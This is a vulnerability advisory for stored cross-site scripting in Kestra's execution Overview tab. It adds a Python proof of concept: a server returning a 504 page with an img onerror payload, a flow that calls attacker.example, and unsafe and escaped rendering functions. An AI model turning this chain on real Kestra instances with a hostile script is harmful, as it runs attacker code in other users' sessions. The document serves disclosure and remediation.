Kestra Stored Cross-Site Scripting Vulnerability
Vulnerability
A stored cross-site scripting vulnerability has been identified in Kestra versions prior to 0.22.0. The execution 'Overview' tab displays the error message of a failed task, and for an HTTP task that message includes the body of the remote server's response. That body is rendered as HTML rather than escaped as text, so JavaScript embedded in the response is injected into the page and executed by the browser of any user who views the execution.
Impact
Exploitation of this vulnerability allows attacker-controlled JavaScript to execute in the context of the Kestra application, in the browser of any user who opens the affected execution's 'Overview' tab. The script runs with that user's session and privileges, which could lead to compromise of the instance.
Reproduction
To reproduce this vulnerability, first set up a web server that returns a response containing a JavaScript payload, such as an image tag with an 'onerror' event handler. Configure the server to return an HTTP 504 status and serve a custom error page containing the injected JavaScript. Next, create a workflow in Kestra that makes an HTTP request to this server; because the server responds with an error, the task fails and the response body is recorded in the execution's error message. Once the execution finishes in an error state, navigate to the 'Overview' tab of that execution: the injected JavaScript executes. Because the payload is persisted with the execution, it fires again for every user who later views that tab.
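The following is an added example, not code from the Kestra project or from the advisory, that implements the reproduction above end to end: a stand-in web server answering every request with HTTP 504 and an error page carrying the 'onerror' payload, the Kestra flow that calls it, and two small rendering functions that model the vulnerable behaviour (response body dropped into the page as raw HTML) next to the fix (body HTML-escaped before rendering). The listening port, the attacker hostname, the flow id/namespace and the task type name io.kestra.plugin.core.http.Request are assumptions made for illustration; check the task type against the plugin documentation for your Kestra version.

```python
"""Reproduction helper for the Kestra execution 'Overview' stored XSS.

Added example; not Kestra project code. Port, hostname, flow identifiers and
the HTTP task type name are assumptions made for illustration.
"""
import html
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed payload: a broken image whose onerror handler runs as soon as the
# tag is rendered as HTML. document.domain is a harmless, visible marker.
PAYLOAD = '<img src="x" onerror="alert(document.domain)">'


def build_error_page(payload: str = PAYLOAD) -> bytes:
    """Body of the 504 response: an ordinary-looking error page with the payload embedded."""
    return (
        "<html><body><h1>504 Gateway Timeout</h1>"
        f"<p>upstream did not respond {payload}</p></body></html>"
    ).encode("utf-8")


class PayloadHandler(BaseHTTPRequestHandler):
    """Answers every request with HTTP 504 and the crafted page, so the Kestra
    HTTP task fails and the body ends up in the execution's error message."""

    def do_GET(self):
        body = build_error_page()
        self.send_response(504)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    do_POST = do_GET


# Assumed flow definition (hostname and task type are assumptions): the task
# requests the attacker server, receives the 504 and fails, and the response
# body is stored with the execution's error message.
KESTRA_FLOW = """\
id: overview_xss_repro
namespace: demo
tasks:
  - id: fetch
    type: io.kestra.plugin.core.http.Request
    uri: http://attacker.example:8080/
"""


def render_unsafe(error_message: str) -> str:
    """Models the vulnerable behaviour: the error message is inserted as raw
    HTML (v-html / innerHTML style), so the <img onerror> tag is live."""
    return f"<pre class=\"error\">{error_message}</pre>"


def render_safe(error_message: str) -> str:
    """Models the fix: escape the message before rendering (textContent style),
    so the payload is shown as text and never parsed as markup."""
    return f"<pre class=\"error\">{html.escape(error_message, quote=True)}</pre>"


def contains_live_markup(rendered: str) -> bool:
    """Crude check used to compare the two renderers: does an executable
    <img ... onerror=...> tag survive in the output?"""
    return "<img" in rendered and "onerror=" in rendered


if __name__ == "__main__":
    # Assumed port; point the flow's uri at this host:port, run the flow, then
    # open the execution's 'Overview' tab in a browser.
    HTTPServer(("0.0.0.0", 8080), PayloadHandler).serve_forever()
```

Run the script, point the flow at it, and the failed execution's Overview tab shows the alert; the render_safe function shows why escaping on output is the correct fix, since the same stored error message renders harmlessly once it is treated as text.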
Remediation
Users should upgrade to Kestra version 0.22.0 or later.
